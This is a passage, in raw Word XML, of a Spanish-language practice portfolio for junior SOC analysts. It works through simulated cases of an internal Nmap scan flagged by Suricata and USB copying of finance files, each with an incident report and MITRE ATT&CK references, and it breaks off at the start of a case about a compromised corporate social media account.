      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> — relevante para mostrar capacidad de distinguir entre incidente real y falso positivo/hallazgo administrativo, evitando "alert fatigue".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4s98xjl5rayc" w:id="9"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CASO 5: Escaneo de red sospechoso detectado por Suricata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Nota:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> práctica teórica y de razonamiento — comandos y logs simulados con fines de aprendizaje, no ejecutados en un entorno real.</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Contexto:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Analista SOC junior. Jueves a la tarde. La empresa tiene Suricata (IDS/IPS) monitoreando el tráfico interno de la red.</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Alerta recibida (panel de Suricata):</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Regla disparada: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"ET SCAN Nmap Scripting Engine User-Agent Detected"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> + múltiples alertas </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"ET SCAN Possible Nmap User-Agent Observed"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. El origen es una IP interna (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">10.0.15.88</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) que en menos de 3 minutos generó conexiones hacia más de 40 hosts distintos de la red interna, en varios puertos (22, 80, 443, 3389, 445).</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Tarea:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> determinar si se trata de actividad legítima (administrador/pentester autorizado) o de un atacante haciendo reconocimiento interno.</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uemkalfk4qwj" w:id="10"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Análisis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1. Por qué el patrón es una señal de alerta</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008F">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">El patrón (40+ hosts, múltiples puertos, en pocos minutos) es la firma característica de una herramienta como Nmap barriendo la red en busca de hosts activos y servicios expuestos (SSH en 22, web en 80/443, RDP en 3389, SMB en 445). Este comportamiento amerita investigación siempre, sea de un pentester autorizado, un administrador o un atacante — la propia actividad de red no permite distinguir la intención, y que ningún sistema haya fallado no descarta que sea malicioso: el objetivo de un escaneo de reconocimiento es recolectar información, no romper nada todavía.</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2. Identificación del origen (IP interna)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000091">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000092">
      <w:pPr>
        <w:rPr>
          <w:color w:val="008080"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="0051c2"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">arp</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="14181f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="008000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-a</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="14181f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> | </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="0051c2"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">grep</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="14181f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="008080"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">10.0.15.88</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094">
      <w:pPr>
        <w:rPr>
          <w:color w:val="14181f"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="14181f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">? (10.0.15.88) at 3c:52:82:1a:9f:0e [ether] on eth0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000095">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">La MAC corresponde, según inventario de activos, a la notebook asignada a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">jperez</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, del área de Redes/Infraestructura.</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3. Confirmación de autorización</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000097">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Se consulta con un superior/equipo de Seguridad (antes que con el propio usuario, para no alertar a un posible atacante) si la actividad estaba planificada. Resultado: no hay ningún escaneo de red programado esta semana, y </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">jperez</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> está de vacaciones desde el lunes — la cuenta/dispositivo está siendo usado sin que su dueño esté presente.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4. Conclusión</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000099">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Se confirma actividad no autorizada: el dispositivo de </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">jperez</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> está siendo utilizado por un tercero para realizar reconocimiento activo de la red interna.</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fi6zm039165a" w:id="11"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Informe de incidente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Vector:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Acceso no autorizado al dispositivo del usuario </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">jperez</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> mientras se encontraba de vacaciones, mediante causa aún no confirmada (hipótesis a investigar: robo de credenciales, fuerza bruta o phishing previo). Detectado por Suricata al identificar tráfico compatible con Nmap Scripting Engine.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Impacto:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Reconocimiento activo de la red interna — conexiones generadas hacia más de 40 hosts distintos en un lapso de 3 minutos, sobre múltiples puertos (22, 80, 443, 3389, 445), indicando fase de escaneo/reconocimiento previa a una posible explotación.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Remediación aplicada:</w:t>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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Aislamiento inmediato del dispositivo de </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">jperez</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> de la red.</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Suspensión de sus credenciales de acceso.</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Revisión de logs de Suricata/firewall para determinar el alcance completo del escaneo y los hosts potencialmente en riesgo.</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Investigación pendiente del vector inicial de compromiso.</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Framework de referencia:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> MITRE ATT&amp;CK — T1046 (Network Service Discovery), T1078 (Valid Accounts).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2qts9jwxtep9" w:id="12"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CASO 6: Dispositivo USB no autorizado conectado a un puesto de trabajo</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Nota:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> práctica teórica y de razonamiento — comandos y logs simulados con fines de aprendizaje, no ejecutados en un entorno real.</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Contexto:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Analista SOC junior. Wazuh detecta la conexión de un dispositivo USB no reconocido en la PC de un empleado del área de Finanzas.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Alerta recibida:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Host </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">FIN-PC-07</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (usuario: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">lrodriguez</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">). Se conectó un dispositivo USB (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">VID_0951&amp;PID_1666</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, marca Kingston, no registrado en el inventario de dispositivos autorizados) a las 14:32. Segundos después, se registró actividad de copiado masivo de archivos desde </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">C:\Finanzas\Reportes\</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> hacia el dispositivo.</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Tarea:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> determinar si se trata de exfiltración de datos y qué acciones tomar.</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1nx7vc16ogc" w:id="13"/>
      <w:bookmarkEnd w:id="13"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Análisis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1. Contención inmediata</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BD">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Se aísla el equipo </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">FIN-PC-07</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> de la red para frenar cualquier otra actividad, y se retiene físicamente el USB como evidencia (sin borrar su contenido).</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2. Verificación de autorización</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BF">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">lrodriguez</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> es un empleado legítimo de la empresa, por lo que no se sospecha de un atacante externo. Se necesita confirmar si tenía autorización para usar dispositivos USB y si la copia de archivos correspondía a una tarea legítima comunicada previamente (ej. pedido de un superior).</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3. Revisión de los archivos copiados (Wazuh — File Integrity Monitoring)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C1">
      <w:pPr>
        <w:rPr>
          <w:color w:val="14181f"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="14181f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2026-XX-XX 14:32:05 - File copied: C:\Finanzas\Reportes\balance_Q3_2026.xlsx -&gt; E:\</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C2">
      <w:pPr>
        <w:rPr>
          <w:color w:val="14181f"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="14181f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2026-XX-XX 14:32:07 - File copied: C:\Finanzas\Reportes\proyecciones_2027.xlsx -&gt; E:\</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="14181f"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="14181f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2026-XX-XX 14:32:09 - File copied: C:\Finanzas\Reportes\cuentas_bancarias_proveedores.xlsx -&gt; E:\</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="14181f"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="14181f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2026-XX-XX 14:32:11 - File copied: C:\Finanzas\Reportes\salarios_gerencia.xlsx -&gt; E:\</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C5">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Se confirma la copia de 4 archivos con información sensible: balance, proyecciones financieras, cuentas bancarias de proveedores y salarios de gerencia.</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4. Clasificación</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C7">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Que el actor sea un empleado no convierte el hecho en falso positivo — un falso positivo requiere que no haya sucedido nada real o que la acción esté autorizada. Al no haber autorización confirmada y tratarse de datos sensibles, se clasifica como posible </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">insider threat</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (amenaza interna), pendiente de determinar intención.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4a0ly39li8ch" w:id="14"/>
      <w:bookmarkEnd w:id="14"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Informe de incidente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Vector:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Conexión de un dispositivo USB no autorizado (marca Kingston, no registrado en el inventario) en la PC de </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">lrodriguez</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, empleado del área de Finanzas, sin autorización confirmada.</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Impacto:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Copia de 4 archivos con información sensible (balance, proyecciones, datos de proveedores, salarios de gerencia) hacia el dispositivo externo — posible exfiltración de datos financieros.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Remediación aplicada:</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Aislamiento del equipo de la red.</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Confiscación física del USB como evidencia.</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Entrevista pendiente con el empleado y un superior para determinar si la acción estaba autorizada.</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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">De confirmarse no autorizada, derivación a Recursos Humanos.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Framework de referencia:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> MITRE ATT&amp;CK — T1052.001 (Exfiltration over Physical Medium: USB).</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y0n3k3n8neyj" w:id="15"/>
      <w:bookmarkEnd w:id="15"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CASO 7: Cuenta de administrador de red social corporativa comprometida</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Nota:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> práctica teórica y de razonamiento — comandos y logs simulados con fines de aprendizaje, no ejecutados en un entorno real.</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Contexto:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Analista SOC junior. La empresa maneja sus redes sociales desde una cuenta compartida de X (Twitter) del área de Marketing. Un martes a la mañana, el equipo de Marketing reporta que la cuenta publicó un tweet promocionando una falsa "preventa de criptomonedas" que nadie del equipo escribió, y que además se cambió el correo de recuperación de la cuenta.</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Tarea:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
